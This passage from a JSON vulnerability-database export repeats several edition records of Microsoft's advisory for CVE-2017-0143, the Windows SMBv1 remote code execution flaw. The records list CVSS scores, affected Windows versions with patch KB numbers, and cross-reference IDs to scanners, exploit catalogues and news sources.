"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", "KB4012606", "KB4012214", "KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", 